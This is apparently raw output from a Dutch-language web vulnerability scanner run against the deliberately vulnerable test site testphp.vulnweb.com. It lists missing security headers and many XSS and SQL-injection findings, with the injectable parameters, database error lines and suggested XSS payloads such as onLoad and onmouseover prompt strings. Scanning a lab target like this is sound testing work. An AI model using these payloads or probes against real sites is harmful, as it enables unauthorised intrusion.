[i] RESULTATEN VAN DE PORTSCAN:
-----------------------
[i] Host: 127.0.0.1 (localhost)
[i] Status: up
-----------------------
[i] De scan heeft 0.42 seconden geduurd.
[i] 1 host(s) gescand op poorten 1-100.
None

[i] RESULTATEN VAN DE HTTP HEADER CONTROLE: 
-----------------------
[i] Response header opgehaald van http://testphp.vulnweb.com
[i] Controleren op NCSC waarden...
-----
[!] X-Content-Type-Options mist.
[!] Content-Security-Policy mist.
[!] Referrer-Policy mist.
[!] Strict-Transport-Security mist.
[!] X-Frame-Options mist.
------------

Controleren op onnodige request methodes:
-----
[*] Ophalen van response header met request method GET is mogelijk.
[*] Ophalen van response header met request method POST is mogelijk.
[*] Ophalen van response header met request method HEAD is mogelijk.
------------

{'Server': 'nginx/1.19.0', 'Date': 'Tue, 21 Jun 2022 12:09:11 GMT', 'Content-Type': 'text/html', 'Content-Length': '157', 'Connection': 'keep-alive'}
Server nginx/1.19.0
Controleren op mogelijk overbodige headers:
-----
[i] Server: nginx/1.19.0
[i] Date: Tue, 21 Jun 2022 12:09:11 GMT
False

[i] RESULTATEN VAN DE TLS-SCAN:
[i] http://testphp.vulnweb.com maakt gebruik van TLS-versies: 
[i] http://testphp.vulnweb.com maakt gebruik van 0 ciphers.
None

[i] MOGELIJKE XSS-KWETSBAARHEDEN: 
m/guestbook.php
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjbm'"(){}<x>:/1zqjbm;9
[+] Type: form
[+] Injectiepunten: name
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <strong>1zqjbm'"(){}<x>:/1zqjbm;9

[i] URL: http://testphp.vulnweb.com/hpp/?pp=12
[i] Response URL: http://testphp.vulnweb.com/hpp/?pp=1zqjpc'%22()%7B%7D%3Cx%3E:/1zqjpc;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjpc'"(){}<x>:/1zqjpc;9
[+] Type: url
[+] Injectiepunten: pp
[+] Mogelijke payloads: x"/onmouseover=prompt(9)/", x" onmouseover=prompt(9) ", x"><svG onLoad=prompt(9)>
[i] Line: <a href="params.php?p=valid&pp=1zqjpc'"(){}<x>:/1zqjpc;9

[i] URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12
[i] Response URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=1zqjjx'%22()%7B%7D%3Cx%3E:/1zqjjx;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjjx'"(){}<x>:/1zqjjx;9
[+] Type: url
[+] Injectiepunten: pp
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <pvalid1zqjjx'"(){}<x>:/1zqjjx;9

[i] URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12
[i] Response URL: http://testphp.vulnweb.com/hpp/params.php?p=1zqjey'%22()%7B%7D%3Cx%3E:/1zqjey;9&pp=12
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjey'"(){}<x>:/1zqjey;9
[+] Type: url
[+] Injectiepunten: p
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p1zqjey'"(){}<x>:/1zqjey;9

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjlf'%22()%7B%7D%3Cx%3E:/1zqjlf;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjlf'"(){}<x>:/1zqjlf;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjlf'%22()%7B%7D%3Cx%3E:/1zqjlf;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjlf'"(){}<x>:/1zqjlf;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjlf;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=4
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjfh'%22()%7B%7D%3Cx%3E:/1zqjfh;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjfh'"(){}<x>:/1zqjfh;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=4
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjfh'%22()%7B%7D%3Cx%3E:/1zqjfh;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjfh'"(){}<x>:/1zqjfh;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjfh;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjfd'%22()%7B%7D%3Cx%3E:/1zqjfd;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjfd'"(){}<x>:/1zqjfd;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjfd'%22()%7B%7D%3Cx%3E:/1zqjfd;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjfd'"(){}<x>:/1zqjfd;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjfd;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjes'%22()%7B%7D%3Cx%3E:/1zqjes;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjes'"(){}<x>:/1zqjes;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjes'%22()%7B%7D%3Cx%3E:/1zqjes;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjes'"(){}<x>:/1zqjes;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjes;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/artists.php?artist=3
[i] Response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjrw'%22()%7B%7D%3Cx%3E:/1zqjrw;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjrw'"(){}<x>:/1zqjrw;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/artists.php?artist=1
[i] Response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjaf'%22()%7B%7D%3Cx%3E:/1zqjaf;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjaf'"(){}<x>:/1zqjaf;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/product.php?pic=6
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjlt'%22()%7B%7D%3Cx%3E:/1zqjlt;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjlt'"(){}<x>:/1zqjlt;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/6.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjsj'%22()%7B%7D%3Cx%3E:/1zqjsj;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjsj'"(){}<x>:/1zqjsj;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjsj'"(){}<x>:/1zqjsj;9

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/3.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjih'%22()%7B%7D%3Cx%3E:/1zqjih;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjih'"(){}<x>:/1zqjih;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjih'"(){}<x>:/1zqjih;9

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/7.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjgb'%22()%7B%7D%3Cx%3E:/1zqjgb;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjgb'"(){}<x>:/1zqjgb;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjgb'"(){}<x>:/1zqjgb;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=3
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjsa'%22()%7B%7D%3Cx%3E:/1zqjsa;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjsa'"(){}<x>:/1zqjsa;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/1.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjfw'%22()%7B%7D%3Cx%3E:/1zqjfw;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjfw'"(){}<x>:/1zqjfw;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjfw'"(){}<x>:/1zqjfw;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=1
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjty'%22()%7B%7D%3Cx%3E:/1zqjty;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjty'"(){}<x>:/1zqjty;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjbg'%22()%7B%7D%3Cx%3E:/1zqjbg;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjbg'"(){}<x>:/1zqjbg;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjbg'%22()%7B%7D%3Cx%3E:/1zqjbg;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjbg'"(){}<x>:/1zqjbg;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjbg;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjct'%22()%7B%7D%3Cx%3E:/1zqjct;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjct'"(){}<x>:/1zqjct;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjct'%22()%7B%7D%3Cx%3E:/1zqjct;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjct'"(){}<x>:/1zqjct;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjct;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/4.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjku'%22()%7B%7D%3Cx%3E:/1zqjku;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjku'"(){}<x>:/1zqjku;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjku'"(){}<x>:/1zqjku;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=2
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjln'%22()%7B%7D%3Cx%3E:/1zqjln;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjln'"(){}<x>:/1zqjln;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/5.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjvy'%22()%7B%7D%3Cx%3E:/1zqjvy;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjvy'"(){}<x>:/1zqjvy;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjvy'"(){}<x>:/1zqjvy;9

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/2.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjpz'%22()%7B%7D%3Cx%3E:/1zqjpz;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjpz'"(){}<x>:/1zqjpz;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjpz'"(){}<x>:/1zqjpz;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=4
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjhh'%22()%7B%7D%3Cx%3E:/1zqjhh;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjhh'"(){}<x>:/1zqjhh;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/product.php?pic=5
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjdw'%22()%7B%7D%3Cx%3E:/1zqjdw;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjdw'"(){}<x>:/1zqjdw;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/product.php?pic=7
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjbe'%22()%7B%7D%3Cx%3E:/1zqjbe;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjbe'"(){}<x>:/1zqjbe;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/artists.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjqk'%22()%7B%7D%3Cx%3E:/1zqjqk;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjqk'"(){}<x>:/1zqjqk;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjsa'%22()%7B%7D%3Cx%3E:/1zqjsa;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjsa'"(){}<x>:/1zqjsa;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjsa'%22()%7B%7D%3Cx%3E:/1zqjsa;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjsa'"(){}<x>:/1zqjsa;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjsa;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.
